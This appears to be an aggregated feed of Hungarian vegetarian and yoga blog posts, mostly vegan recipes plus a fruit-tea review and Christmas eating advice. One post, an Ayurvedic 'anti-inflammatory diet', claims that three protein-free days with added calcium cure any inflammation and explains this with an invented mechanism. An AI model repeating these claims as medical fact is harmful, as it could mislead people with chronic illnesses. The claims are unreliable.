paradicsom, és a tetejére, ami nem maradhat el, a balzsamecet! Az a fekete folyadék, amit láttok a képen, a balzsamecet.
Mindig törekedj a fény felé
2017. január 17. Élj harmóniában
Az életben minden dolognak van egy sötétebb és egy napfényes oldala. A fény felé törekedni általában nehezebb, de hosszú távon az teszi az életedet kiegyensúlyozottá, harmonikussá. Ha mindig a fény felé törekszel, akkor a személyiséged is egyre ragyogóbbá válik - megnyilvánul a kegyesség, szeretet, nagylelkűség, kitartás, türelem, mentesség a büszkeségtől, elfogadás, rugalmasság. A sötétség útja egyszerűbbnek, könnyebbnek tűnik, de a mélybe vezet, mert az önkontroll hiányával párosul. Megjelenik a düh, agresszió, mohóság, büszkeség, gőg, türelmetlenség, elfogadás hiánya, szűklátókörűség, önközpontúság, irigység. Nincs pusztítóbb, mint egy kontrollálatlan, szabályozatlan elme. Fejleszd a személyiséged, légy tudatos és fegyelmezett, gyakorold az önkontrollt. Szabályozd, az étkezéseket, a beszéded és az elméd. Kövesd a jógikus viselkedés szabályait. Fantasztikus változásokat fogsz tapasztalni az életedben és a személyiségedben.
A gyulladás csökkentő diéta!
2017. január 4. Eszemiszom – Jóga Magazin
Na, ez lett a Kutir oldalával kapcsolatos új évi fogadalmam, mármint az, hogy a régebbi elmaradásaimat behozom. Ezt a diétát már annyiszor terveztem megosztani, mert nekünk nyugatiaknak, talán ez az egyik leghatékonyabb Ájurvédikus rövid kúra, amit tehetünk magunkért, de eddig még nem sikerült leírnom.
Tehát, amennyiben 3 napig nem eszünk fehérjét, és pluszban még kalciumot is viszünk be, minden gyulladás elmulasztható!
Természetesen, régóta fennálló, vagy krónikus gyulladás esetén, ezt ismételni kell, de már az első 3 nap után ég és föld a különbség! Ilyen esetekben az Ájurvédában 6 ismétlést ajánlanak, heti ismétléssel, majd lekövető fázisban havi 1 ismétlést. Ezek természetesen 3 egymást követő napok legyenek.
Egyébként a hatás mechanizmusa ennek a kúrának az, hogy amikor nincs fehérje bevitel szervezetünk a többlet kalciumot megpróbálja beépíteni a csontszerkezetbe. De ez csak 3 nap után szokott neki sikerülni. Mert egyébként a fehérje feldolgozásához szervezetünk a már beépült kalciumból használ fel, de amikor nincs fehérje bevitel, de van többlet kalcium, azt az első 3 napban keringteti a szervezetünkbe, és az így mindenhová eljut.
Kalciumilag reggel-este 500-500 milligramm az ajánlott bevitel.
A fehérje szempontjából, meg az abszolút minimum az irányadó elv. Az állati, és a növényi fehérjét is kerüljük. Természetesen szinte mindenben van fehérje, de amennyiben nem lépjük át a 15 gramm fehérjét / 100 gramm tömeghez viszonyítva, a kúra működik.
Így íme egy iránymutató felsorolás az alacsony fehérje tartalmú, eme kúrával kompatibilis ételekből:
- Gumók és gyökér félék: Krumpli, répa, zeller, cékla, karalábé, retek és hagyma.
- Tökfélék: Sütő és főző tök, édesburgonya, padlizsán és cukkini.
- Karfiol, paradicsom és paprika.
- Gyümölcsök kivéve banán és avokádó.
- Gabonafélék: Rizs (fehér), árpa, hajdina és köles.
- Olajak: Olíva, szezám, repce, napraforgó, stb...
Egyébként a tűz alkatú delikvenseknek, amúgy is ajánlott ezt a kúrát betartani havonta egyszer. És közvetetten ez a gyulladás csökkentő beavatkozás egy csomó másra is kihat, hiszen minden túl működés, minden más túlműködést is fokoz.
Tehát a gyulladás csökkentés jótét módon hat a gyomorsav túltengésre, a magsasvérnyomásra, a stressz hormon többletre, stb...
Meg hát mi nyugaton amúgy is túl sok fehérjét fogyasztunk, szóval ártani nem árt.
Om Tat Sat
Baktai Ádám Védikus pap, a Védikus tudományok szakértője
Egyszerű, tojásmentes Mennyei csokoládétorta tönkölybúzaliszttel
2017. január 1. Élj harmóniában
A tortakészítés egy izgalmas feladat. Ilyenkor is az egyszerűbb recepteket szeretem, amit csak kikeverek és beleöntök egy tortaformába és már készen is van. :) Nem szoktam krémes tortákat készíteni - mert általában túl vannak számomra bonyolítva a receptek és sok receptben tojás is van. A férjem Édesanyjának volt a születésnapja (dec.31.) és lévén előző héten túrótortát csináltam, mindenképpen valami nagyon más ízvilágot szerettem volna. Ő nem szereti a túl édes dolgokat és így esett a választásom a csokoládétortára. Nagyon sokféle receptet megnéztem, beszéltem néhány barátommal, ők hogyan csinálják, majd végül egy kedves ismerősöm javaslatára párizsi krémet ( ganache vagy trülffel néven is ismert ) készítettem. Ami szerintem a létező legfinomabb, legcsokoládésabb és egyben legegyszerűbb csokoládé krém - szuper minőségű tejszín és csokoládé keveréke. Ez nem a gazdaságos csokoládékrém változat. Ennél a receptnél nem lehet kispórolni az alapanyagot, ha valóban isteni finom csokoládétortát szeretnél:) Mindig hangsúlyozom, milyen fontos, hogy jó minőségű ételeket fogyassz - erre ne sajnáld az energiát, időt és a pénzt. Mert nem csak az ételek íze, de az egészségi állapotod is romlik, gyengül az immunrendszered és az emésztésedre is kedvezőtlenül hatnak a nem megfelelő minőségű ételek. Lehetőleg vegyszermentes (bio) alapanyagokat használj. Legyen az elved: inkább a minőség, mint a mennyiség. Egy jó étel elsődleges titka , hogy jó minőségű alapanyagokból kell elkészíteni. Hozzávalók a piskótához 30 dkg teljes kiőrlésű tönkölybúzaliszt 20 dkg fehér tönkölybúzaliszt 20 dkg teljes értékű barna nádcukor 1 csg. sütőpor 5 ek kakaó (cukrozatlan, jó minőségű) 3 ek. citromlé (friss citromból) vanília 12 ek. repceolaj 5 dl víz A piskótát általában egyben szokták megsütni és utána szelik. Én biztosra szerettem volna menni, hogy véletlenül se törjön el vágásnál a piskóta, ezért inkább két részletben sütöttem meg ezt a mennyiséget - így a tortám az alján és a tetején is sima felületű lett. Ebben az esetben kétszer kell kikeverni a fele mennyiséget - amikor a nedves és száraz alapanyagokat összekevered, utána viszonylag gyorsan kell betenni a sütőbe. Í gy biztosan szépen feljön a tésztád . Először a por hozzávalókat tedd egy tálba, majd keverd össze. Ezután tedd hozzá a vizet, citromlevet és az olajat. Az egészet keverd jól össze és kivajazott, lisztezett tortaformába öntsd bele. 180 fokra előmelegített sütőben süsd készre. ( Ez kb. 40 perc, ha egészbe sütöd a piskótát és ha két részletbe sütőd, akkor kb.2* 25 perc) a krémhez 300 ml tejszín 30 dkg nagyon jó minőségű keserű csokoládé 3 dkg vaj vanília Forrald fel a tejszínt, majd vedd le a tűzhelyről és öntsd bele a feldarabolt csokoládét, csipet vaníliát és a vajat Picit megkeverve hagyd, hogy felolvadjon a csokoládé. (Ha édesebb csokoládékrémet szeretnél, akkor tehetsz hozzá egy kis nádcukrot is). Hagyd a keveréket kihűlni, majd tedd hűtőszekrénybe minimum 3 órára. Amikor jól kihü lt a krém, habverővel habosítsd ki. A krém picit kevesebb, mint a felét kend a két piskótalap közé, majd a többit kend el jól a tetején és az oldalán. Ezt követően kidíszítheted a tortát. A díszítésnek csak a fantáziád szabhat határt. :) Én felforraltam egy kis tejszínt, beleolvasztottam egy kis csokoládét. Majd behűtöttem és hidegen felvertem kemény habbá. A csokoládés tejszínhabot habzsákba töltöttem és ezzel díszítettem és némi mandulaforgáccsal.
Egyszerű zöldségkrémleves kakukkfűvel
2016. december 31. Élj harmóniában
Egyszerű zöldségkrémleves kakukkfűvel Itt a tél és ilyenkor mi sem finomabb egy jó meleg levesnél. A levesek egyik fajtája a krémleves, aminek az elkészítéséhez szükséges egy kis konyhai segédeszköz használat is. Én fém botmixert szoktam használni hozzá, de olyan turmixgépet is használhatsz, ami üvegből van és hőálló. Műanyag botmixert csak akkor használj, ha előtte kicsit kihűtötted a levest - a turmixolás után, ilyenkor melegítsd újra a levest . Ezt a levest mindenféle zöldségekből vegyesen szoktam készíteni. Az alapanyagokat kedvedre variálhatod kedvenc zöldségeidből. Mivel 15 éve bio táplálkozó vagyok, minden receptnél odaírom, hogy v egyszermentes (bio) alapanyagokat használj. Szerintem sokkal fontosabb a minőség, mint a mennyiség. Ennél a levesnél nagyon lényeges az alapanyagok minősége, mert teljesen más íze lesz a levesednek, ha a zöldségek vegyszeresek. Pl. e gy vegyszermentes fehérrépa kifejezetten finom és édeskés, én akár önmagában is imádom párolva vagy sütve vagy grillezve . Magyarországon nem sok mindent készítenek fehérrépával és s ajnos a legtöbb levesbe főzött fehérrépa amivel gyerekkoromban találkoztam kesernyés, és rossz ízű volt. Hozzávalók: 4 sárgarépa 1 fehérrépa egy kis fej brokkoli 1 kis fej zeller 1 ek. ghí (tisztított va vagy vegán változatban bármilyen olaj) asafoetida (hagymával helyettesítheted) kurkuma só bors kakukkfű petrezselyem Vegyszermentes (bio) alapanyagokat használj! A levesnek teljesen más íze lesz, ha nem jó minőségűek az alapanyagok. A zöldségeket tisztítsd meg és vágd darabokra, a brokkolit szedd rózsáira és a szárát is aprítsd fel. Melegítsd fel az edényt és tedd bele a ghít (vagy bármilyen zsiradékot). Szórd a ghíbe az asafoetidát, pirítsd egy picit, majd szórd hozzá a kurkumát. Tedd hozzá a zöldségeket, a sót, borsot és egy pici vizet, majd fedő alatt, takarékon párold meg a zöldségeket. Amikor már majdnem megpuhulnak a zöldségek, tegyél hozzá 2 kis ágnyi kakukkfüvet és petrezselymet, majd öntsd fel még annyi vízzel, hogy bőven ellepje a zöldségeket. Addig főzd, amíg a zöldségek megpuhulnak - de ne főzd szét. Majd botmixer segítségével pürésítsd. Tálalásnál a tetejét díszítheted friss petrezselyemmel és kakukkfűvel.
Szezámmagos spenótos kréker, a szilveszteri sörkorcsolya (gluténmentes, laktózmentes, tojásmentes, vegán)
2016. december 28. Zöld Avocado
szezámmagos spenótos kréker (glutén-, laktóz-, tojásmentes, vegán) Nyakunkon a Szilveszter. Egy naptári év lezárul és megkezdődik egy újabb év. Új év, új lehetőségek, új kalandok, új ismeretségek, megújulás. Sokan ünneplik az év utolsó napját nagyszabású városi mulatsággal, kisebb házibulival vagy a legfontosabb emberek társaságában, kellemes családi hangulatban. Akárhogy is lesz, az édes sütemények mellé (ami már lassan a fülünkön folyik ki így Karácsony után), jól esik néhány szem sós illetve fűszeres ropogtatnivaló. Ha van kedvünk és időnk készítsünk mi magunk sós rágcsákat, melyek könnyedén csúsznak le egy-egy doboz sör vagy pohár pezsgő mellett. Mint, ahogyan azt már megszokhattátok tőlem, igyekszem figyelni minden vendégemre, így ismét egy "mindenmentes", vegán vendégvárót tehetünk az asztalra. Izgalmasan hangzik, kevésbé mutatós, de emlékezetes és tápláló a spenótos kréker, melyet eredetileg ezen a külföldi oldalon láttam meg. szezámmagos spenótos kréker (glutén-, laktóz-, tojásmentes, vegán) HOZZÁVALÓK (kb. 5-6 főre) - 100 g rizsliszt - 20 g lenmagliszt - 80 g mandulaliszt / darált mandula - 1 tk sütőpor / szódabikarbóna - 1 ek Himalája só - 80 ml tetszés szerinti növényi joghurt (én szója joghurtot használtam) - 1 ek olívaolaj - 80 g friss spenótlevél - 1 ek szezámmag a tésztába - fehér és fekete szezám a tetejére (belegyúrni kicsit) szezámmagos spenótos kréker (glutén-, laktóz-, tojásmentes, vegán) ELKÉSZÍTÉS 1) A megmosott spenótot joghurttal, olajjal összeturmixoljuk. 2) Összekeverjük a száraz és nedves hozzávalókat. 3) Összegyúrjuk a tésztát, majd vékonyra kinyújtjuk egy sodrófával. (Kb. olyan vastagra, mint a bolti krékerek.) 4) Megszórjuk a nyers tészta tetejét a fehér és fekete szezámmaggal. 5) Egyszer végiggurítjuk rajta a sodrófát úgy, hogy a szezámmagok kicsit belenyomódjanak a tésztába (nem potyog majd le). 6) Tetszés szerinti méretben felvágjuk egy éles késsel. 7) Mehet be az előmelegített sütőbe. 200°C-on kb. 20 perc alatt készre sül a ropogós sós rágcsa. Zacskóban tárolva nem szárad ki olyan hamar. ÖRÖMÖKBEN, SZERETETBEN, SIKEREKBEN ÉS EGÉSZSÉGBEN GAZDAG BOLDOG ÚJ ÉVET KÍVÁNUNK MINDENKINEK! :-) szezámmagos spenótos kréker (glutén-, laktóz-, tojásmentes, vegán) Ne feledd el 2017-ben sem, hogy TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! Megjegyzés: A lenmagliszt elhagyható a receptből. Ez egy kis plusz, amivel a krékerek tápértékét növeltem, de nem szükségszerű felhasználni. Ha kihagyjuk, tegyünk bele 20 grammal több rizslisztet és ne lepődjünk meg, hogy a végeredmény színe zöldebb lesz, mert a barna lenmagliszt kikerül belőle.
Vegán kuglóf
Jolly joker tésztát mutatok most meg. Az alaptészta egy finom kalács-tészta, ami szabadon variálható például felét kakaósra készítve, vagy az egészet aszalt gyümölccsel felturbózva. Ha kuglóf formába tesszük, kelt-kuglófot is kreálhatunk belőle. Ha újra készíteném, fonott kalács lenne, aminek az egyik fonata kakaós lenne, vagy a három fonatból kettő legalább. Azért is szeretem ezt a tésztát, egyrészt, ahogy már korábbi bejegyzésemben meséltem, gyerekkorom meghatározó íze volt a kakaós kalács, amit "a mama" készített, megint máskor, talán ovis koromban, nálunk aludtak a lépcsőházbeli egyik szomszéd gyerekei, és kakaós kalácsot ettünk és kakaót ittunk reggelire. Másrészt azért szeretem, mert naná, hogy gasztro-ajándékot is lehet készíteni belőle! Én tutira örülnék egy vegán kuglófnak, amit otthon süt valaki nekem, legyen az aszalt gyümölcsös, vaníliás vagy kakaós. A celofánba csomagolt szív-, csillag- és virágformákat angliai munkatársaimnak készítettem karácsonyi ajándéknak. A gyümölcsös kuglóf egy idősebb hölgy ismerősömnek készült, a kakaós kuglóf pedig vendégváró falat. Igen, ezzel a sokkal (8 rúd+2kuglóf) egy egész napot a konyhában töltöttem, és a lent bemutatott recept többszörösét készítettem el, de úgy látom, megérte az időt és az energiát. Azért is, mert idekinn, főleg az angolok, egyszerűen csak megveszik a boltba a karácsonyi édességet, nem igazán jellemző, hogy sütögetnek. Főleg nem hosszabb ideig.
A recept
Hozzávalók:
- 4.2 dkg élesztő
- 3.2 dl meleg növényi tej
- 15 dkg teljes kiőrlésű liszt
- 35 dkg fehér liszt (BL-55) (+ a forma kikenéséhez egy kevés)
- 5 dkg őrölt zabpehely
- 1-2 dkg őrölt lenmag
- 1 dl víz
- 10 dkg gyümölcscukor (vagy nyírfacukor vagy kókuszvirág cukor, ki mivel édesít)
- 1 rúd kikapart vanília (opcionális, vanília aroma is jó)
- 2-3 evőkanál kakaó/karobport vagy apróra vágott aszalt gyümölcs)
- 5 dkg kókusz zsír vagy növényi margarin (+ a forma kikenéséhez egy kevés)
Elkészítés:
Fogunk egy nagyobbacska tálat, amibe az élesztőt belemorzsoljuk. Tűzhelyen kézmelegre megmelegítjük a szójatejet (ne mikróba). Az élesztőt meghintjük egy kevés cukorral, majd a kellemesre felmelegedett tejet ráöntjük. Amíg várjuk, hogy felfusson vagy eleledjen az élesztő, elővesszük a többi hozzávalót. Az őrölt lenmagra ráöntjük a vizet és várunk pár percet, ez képes a tojást helyettesíteni.
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is, a vízben megáztatott lenmaggal együtt, kivéve a kakaóport/aszalt gyümölcsöket. Először fakanállal összekeverjük, majd kezünkkel jól átgyúrjuk. Ha túl száraz lenne, egy kevés szójatejet vagy vizet öntünk hozzá, ha túl nedves, kevés lisztet szórunk a tetejére. Addig kell gyúrni, míg az edénytől el nem válik.
Ha kis gömböccé állt össze, meleg helyen lefedve pihentetjük kb. 45-60 percet. Amikor megkelt a tészta, kivesszük, elfelezzük és az egyik feléhez keverünk kakaót valamint egy kevés gyümölcscukrot. Vagy az egészhez aszalt gyümölcs-darabokat szórunk.
A sütőformákat kikenjük egy kevés kókusz zsírral és megszórjuk egy kevés liszttel. Ha csőformánk van, mint nekem a szív, virág és csillag alakú csőforma, akkor a tésztát lisztezett gyúródeszkán átgyúrjuk, kinyújtjuk, a kinyújtott fehér tésztára ráhelyezzük a kinyújtott kakaóst és felcsavarjuk. A kuglófot ugyanígy megcsinálhatjuk, ha van időnk és kedvünk. A formákban kelesztjük még kb. 20-30 percet, majd előmelegített sütőben 180 fokon kb. 30 percet sütjük.
Ha kihűlt, akkor szeleteljük, vagy készítjük el ajándéknak. A csillag, szív és virágforma mindkét végét csokiszószba mártottam (olvasztott étcsoki kevés kókusz zsírral), majd dekorcukrot szórtam rá. Hűtőbe tettem pár órára, hogy mielőbb megdermedjen. (Akár egy éjszakára is pihentethetjük ott.) Ajándékozás előtt sütőpapírba és celofánba csomagoltam, mint egy szaloncukor.
Remek eledel tízóraira a gyereknek, de hétvégi ebédünket is lezárhatjuk vele. Délutáni uzsonna vagy teázás édes kísérője lehet. Karácsonyra vagy más családi ünnepre is megsüthetjük. Szuper kis gasztro-ajándék.
UI: Szándékosan ebben az irányban tettem az asztalra a kuglófot. Nekem így jobban tetszik, persze meg is lehet fordítani, porcukorral megszórni, vagy csokiszósszal leönteni.
Tudatos felkészülés a karácsonyra – 8. rész Az étkezés
2016. december 19. Eszemiszom – Jóga Magazin
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet
A karácsonyi ünnepek idején sok családban az étkezés központi helyet foglal el – vannak olyan családok is, ahol szinte másról sem szól a szeretet ünnepe, mint az evésről. Megannyi statisztika támasztja alá, hogy az ünnepi időszak alatt az emberek jelentős része a normál – általában elfogyasztott – mennyiségű élelmiszer többszörösét vásárolja meg, készíti el és fogyasztja el. Majd az ünnepi hangulat helyett, sokaknak okoz a nagy mennyiségben elfogyasztott mindenféle egészségtelen étel, nehéz emésztést, emésztési problémákat, mindenféle fájdalmakat, elnehezültséget. tunyaságot. Az emésztési problémák miatt a gyengülő immunrendszer következtében az ünnepek után sokan megbetegszenek, mert már az első kórokozó is betegsége t vált ki belőlük. Sajnos a tudatos táplálkozás hiánya miatt a karácsonyi időszakban hatalmas mennyiségben fogynak a patikákban a különböző emésztést segítő gyógyszerek, tabletták, készítmények.
Nem kell, hogy a karácsonyod az emésztési kínokról szóljon. Kis odafigyeléssel, tudatossággal elérheted, hogy az ünnepek alatt friss, ízletes, tápláló ételeket egyél Te és a családod is és az étkezés után energikusnak, könnyednek érezzétek magatokat.
Ahhoz, hogy a pénzedet és az energiádat se pazarold és kiváló legyen a közérzeted, tervezd meg előre a karácsonyi időszak menüit – mindenből csak annyi főre tervezz, ahányan lesztek. Azért mert karácsony van, senkinek nem kell és nem is érdemes három ember helyett ennie. A menü összeállításánál törekedj inkább arra, hogy friss, egészséges legyen és arra, hogy ne vállald túl magad a konyhai feladatokkal.
Nem érdemes túl bonyolult ételeket készíteni, hasznosabb ha több időt töltesz a családoddal és egyszerű, gyorsan elkészíthető, friss egészséges, ízletes ételeket választasz a karácsonyi menühöz. Itt is vedd figyelembe a kevesebb néha több elvet. Inkább a minőségi ételeken legyen a hangsúly, mint a mennyiségen. Inkább a friss, egyszerű és egészséges ételeket preferáld, mint a bonyolult, egészségre kevésbé kedvező ételeket.
A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család.
A karácsony lényege a hangulat, az hogy a családoddal harmonikusan, szeretetben tudj közösen időt tölteni. Amennyiben a szeretet és harmónia elmarad, azt semmilyen étellel nem lehet pótolni. nem érdemes a karácsonyi menü miatt elégedetlenkedni, veszekedni.
A megtervezett menühöz írd össze az alapanyagokat és ha teheted, interneten keresztül rendeld meg, így elkerülheted a boltokban és az utcákon, bevásárlóközpontokban való tolongást és több szabadidőd is marad, amit együtt tudtok tölteni a családoddal.
Törekedj a mértéktartó étkezésre és a friss, minőségi ételek fogyasztására, hogy jól indulhasson a következő éved:)
Néhány javaslat a blogról a karácsonyi menühöz – a linkre kattintva eléred a receptet. A receptek nem tartalmaznak húst, halat, tojást, azaz alapvetően laktovegetáriánus receptek, de sok van köztük ami laktózmentes, gluténmentes ételek. Nézelődj kedvedre:)
Édes sütemények, kekszek
Citromos vaníliás keksz
Reform csokis keksz
Egyszerű kókuszos zabpelyhes keksz
Karácsonyi keksz teljes kiőrlésű liszttel
Házi készítésű cukormentes csokoládé
Teljes kiőrlésű tönkölykeksz naranccsal és mandulával
Narancsos mazsolás keksz
Gluténmentes, laktózmentes, cukormentes vaníliás keksz
Zablisztes almás-diós muffin
Gluténmentes, tejmentes, cukormentes köles desszert
Házi készítésű mogyorós csokoládé
Egyszerű, sült túrótorta
Kókuszos, kakaós tönkölysütemény
Reform almás szamósza
Tejmentes sütőtökös muffin
Gluténmentes muffin
Teljes kiőrlésű, tojásmentes linzer
Reform almás pite tönkölybúzaliszttel
Tejmentes, tojásmentes mandulás muffin
Gluténmentes, cukormentes, tejmentes meggyes muffin
Shortbread keksz – reform változat
Bögrés mákos sütemény
Gluténmentes bögrés süti
Sós vendégvárók
Egyszerű sós stangli
Élesztőmentes, gyors túrós vendégváró
Gyors, élesztőmentes tejfölös pogácsa
Gluténmentes sós muffin
Cukkinis, pirított napraforgómagos minikifli
Gyors hummuszkrém
Élesztőmentes cukkinis pogácsa
Ebéd vagy vacsora ételek
Indiai Dhal – mungbab leves
Quinoa, brokkolis zöldségekkel
Sült padlizsános, sült házi sajtos főétel
Káposztás subji – ízletes fűszeres káposztás étel
Vegyes zöldséges subji – zöldséges főétel
Cukkini-burgonya curry
Hummusz
Sütőtökös subji
Zöldséges, csicseriborsós kuszkusz
Kitri (kichari)
Vöröslencsés, zöldséges lasagne
Gluténmentes zöldségfasírt
Polenta krémesen, párolt zöldségekkel
Gluténmentes zöldséges lepény
Zöldséges polenta pizza
Fűszeres vöröslencse dhal, aszalt paradicsomos, sajtkrémes muffinnal
Sütőben sült köles kása
Sütőben sült fűszeres karfiol
Céklás zöldségek hajdinával
Gyors, egyszerű csicseriborsós curry
Zöldséges pizza
Pudla, gluténmentes indiai lepény
Baszmati rizs zöldségekkel, korianderrel
Feketemustármagos zöldbab paradicsomszószban
Fűszeres sült, sütőtök
Édesköményes lepény
Mindenféle finomságok
Chapati – indiai lepénykenyér
Gyömbér tea
Alma csatni
Szilva csatni (sós, édes,csípő finomság)
Quacamole
Uborka raita
Reggeli mandulaturmix
Datolyás tejturmix
Krémes zabkása dióval és mazsolával
Pirított, párolt gyümölcsök – ájurvédikus reggeli
Házi joghurt készítése
Gyors, élesztőmentes kenyér
Jó étvágyat kívánok:)
szeretettel:
Kati
Vegán krumplifőzelék töltött káposztalevéllel
2016. december 9. Vegán lettem
A vegán krumplifőzelék töltött káposztalevéllel egy régi kedvenc újragondolva, frissítve, növényi alapokon.
Első körben csak egy egyszerű krumplifőzeléket szerettem volna készíteni, de útközben megiramodott a kezem és megtöltöttem pár káposztalevelet. A képek magukért beszélnek, lássuk miből készült ez a finomság:
Vegán krumplifőzelék töltött káposztalevéllel, a hozzávalók:
0,5kg krumpli
1 db zöldségleves kocka
2-3db babérlevél
1-1,5dl növényi tejföl
2 kanál liszt
kevés margarin
só, bors
8db kelkáposztalevél
15dkg szejtánpor
növényi sajt
1 kisebb fej hagyma
kevés főtt rizs
fokhagymapor
majoránna
Vegán krumplifőzelék töltött káposztalevéllel, az elkészítés:
A megtisztított krumplit kockázd fel és főzd meg a zöldségleves kockával, valamint a babérlevéllel. Miután ezzel készen vagy keverd el a növényi tejfölt a liszttel, kevés meleg főzőlé segítségével. Miközben csomómentesre kevered, ízesítsd sóval és borssal, majd főzd tovább és ízlés szerint adj hozzá egy kevés margarint.
A kelkáposztaleveleket főzd meg és miközben fő a zöldség, készítsd el a szejtánporból a főtt szejtánt. (A Töltött rántott szejtán receptünkben találhatod a szejtán elkészítésének módját.) Az elkészült szejtánt daráld le, majd melegíts fel egy kis olajat és dinszteld meg a hagymát benne. Tedd rá a darált szejtánt a hagymára, majd adj hozzá sót, borst, fokhagymaport és egy kevés majoránnát. Az ízesített szejtánt pirítsd meg, majd keverj hozzá négy evőkanál főtt rizst. Amikor kész a töltelék, nyomkodd ki a káposztaleveleket, majd minden levél közepére tegyél a töltelékből, hajtsd be az oldalait és tekerd fel őket.
Melegítsd elő a sütőt 180°C -ra, majd margarinnal kenj ki egy tepsit. Tedd bele a megtöltött káposztaleveleket, öntsd le a leveleket növényi tejföllel, majd szórd meg reszelt növényi sajttal és tedd a sütőbe 30 percre. A vegán krumplifőzelék mellé tálald a frissen megsült töltött káposztaleveleket.
Jó étvágyat!
(Növényi tejföl készítése: darálj le egy kávédarálónyi napraforgót, majd turmixold össze négy kanál főtt rizzsel, kevés olajjal, citromlével, sóval és egy kevés langyos vízzel; apránként adva hozzá vizet, fehéredésig turmixold.)
Termékteszt: Frupka sült tea
A november-december nem a legkönnyebb időszaka az évnek – már egy ideje hideg van, korán besötétedik, a levelek lassan elveszítik napfényszínüket, a vitaminszint csökken, a friss hazai gyümölcsök helyett a citrusok veszik át a helyet a boltokban. Lelkileg és anyagilag is készülni kell a karácsonyra. Ilyenkor tök jó, ha vannak dolgok, amik feldobnak. Egy forró fürdő, egy szép, puha pléd, vagy egy bögre színes gyümölcstea a kedvenc bögrédben. Ez utóbbiból (a teából, nem a bögréből) kaptam kipróbálásra egy 6 darabos díszdobozt, az elmúlt hetekben ez igazi jutalom volt.
A Frupka sült tea első ránézésre olyan, mint egy cuki lekvár. Azonban a lekvárnál hígabb, szirup szerű, és benne úszkálnak a gyümölcsök, szó szerint amennyi csak belefér. Igazi kis szépség egy-egy ilyen üveg, egyedül a csomagoláson finomítanék egy kicsit, de ez már szakmai ártalom.
Azért “sült” tea, mert nem befőzik, mint a lekvárt, hanem sütik – 150 éves cseh recept alapján. A sütés és dunsztolás miatt ugyanolyan sokáig eltartható, mint a lekvárok, de nincs benne tartósítószer. Egy üveg tartalmából egy bögre tea készíthető, hidegen vagy melegen. Rengeteg féle különleges ízben elérhető, nem tartalmaz semmilyen mesterséges adalékanyagot, sem koffeint, sem répacukrot. Fruktóz (gyümölcscukor) hozzáadásával édesítik, ami nekem személy szerint azért jó, mert nem hozza elő az ekcémámat a répacukorral és a nádcukorral ellentétben.
Szeder ízű Frupka sült tea
Nagyon klassz ízkombinációkat találtak ki, mint pl. a mentás alma vagy a vaníliás eper, de gyömbéres, homoktövises és fekete berkenyés verzióban is kapható a hagyományos ízek mellett. Ne számíts az ilyen agyeldobós-pikvikkes mű gyümölcsízre, mert azokat nem a kertben, hanem a laboratóriumban szüretelik. A Frupka finom, édesszájúaknak is elég édes, gyümölcsös, kicsit karamellás, nagyi lekvárja jellegű, de annál mégis frissebb ízű gyümölcstea. Én a javasoltnál több vizet használtam a hígítására, nekem túl édes lenne, és így tovább is élvezhetem az ízeket.
Nem csak önmagában, teaként lehet elkészíteni, növényi joghurt tetejére téve is biztos nagyon fincsi, és ha valaki nem szereti a gyógyteákat, Frupkával keverve simán meg lehet vele szerettetni. Minden termékük vegán, különböző kiszerelésekben lehet kapni, és már sok helyen megvásárolható személyesen vagy webshopon keresztül. Vendéglátóhelyeken is kipróbálhatod, a térképes listát ugyanezen a linken nézheted meg.
Én leginkább ajándékba venném meg, mert ára egy kicsit borsos, magamnak ritkán veszek ilyesmit. De ha valakitől ilyet kapnék, tuti nagyon örülnék neki megint.
The post Termékteszt: Frupka sült tea appeared first on VegaNinja.
Tudatos felkészülés a karácsonyra - 8. rész Az étkezés
2016. december 6. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet A karácsonyi ünnepek idején sok családban az étkezés központi helyet foglal el - vannak olyan családok is, ahol szinte másról sem szól a szeretet ünnepe, mint az evésről. Megannyi statisztika támasztja alá, hogy az ünnepi időszak alatt az emberek jelentős része a normál - általában elfogyasztott - mennyiségű élelmiszer többszörösét vásárolja meg, készíti el és fogyasztja el. Majd az ünnepi hangulat helyett, sokaknak okoz a nagy mennyiségben elfogyasztott mindenféle egészségtelen étel, nehéz emésztést, emésztési problémákat, mindenféle fájdalmakat, elnehezültséget. tunyaságot. Az emésztési problémák miatt a gyengülő immunrendszer következtében az ünnepek után sokan megbetegszenek, mert már az első kórokozó is betegsége t vált ki belőlük. Sajnos a tudatos táplálkozás hiánya miatt a karácsonyi időszakban hatalmas mennyiségben fogynak a patikákban a különböző emésztést segítő gyógyszerek, tabletták, készítmények. Nem kell, hogy a karácsonyod az emésztési kínokról szóljon. Kis odafigyeléssel, tudatossággal elérheted, hogy az ünnepek alatt friss, ízletes, tápláló ételeket egyél Te és a családod is és az étkezés után energikusnak, könnyednek érezzétek magatokat. Ahhoz, hogy a pénzedet és az energiádat se pazarold és kiváló legyen a közérzeted, tervezd meg előre a karácsonyi időszak menüit - mindenből csak annyi főre tervezz, ahányan lesztek. Azért mert karácsony van, senkinek nem kell és nem is érdemes három ember helyett ennie. A menü összeállításánál törekedj inkább arra, hogy friss, egészséges legyen és arra, hogy ne vállald túl magad a konyhai feladatokkal. Nem érdemes túl bonyolult ételeket készíteni, hasznosabb ha több időt töltesz a családoddal és egyszerű, gyorsan elkészíthető, friss egészséges, ízletes ételeket választasz a karácsonyi menühöz. Itt is vedd figyelembe a kevesebb néha több elvet. Inkább a minőségi ételeken legyen a hangsúly, mint a mennyiségen. Inkább a friss, egyszerű és egészséges ételeket preferáld, mint a bonyolult, egészségre kevésbé kedvező ételeket. A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család. A karácsony lényege a hangulat, az hogy a családoddal harmonikusan, szeretetben tudj közösen időt tölteni. Amennyiben a szeretet és harmónia elmarad, azt semmilyen étellel nem lehet pótolni. nem érdemes a karácsonyi menü miatt elégedetlenkedni, veszekedni. A megtervezett menühöz írd össze az alapanyagokat és ha teheted, interneten keresztül rendeld meg, így elkerülheted a boltokban és az utcákon, bevásárlóközpontokban való tolongást és több szabadidőd is marad, amit együtt tudtok tölteni a családoddal. Törekedj a mértéktartó étkezésre és a friss, minőségi ételek fogyasztására, hogy jól indulhasson a következő éved:) Néhány javaslat a blogról a karácsonyi menühöz - a linkre kattintva eléred a receptet. A receptek nem tartalmaznak húst, 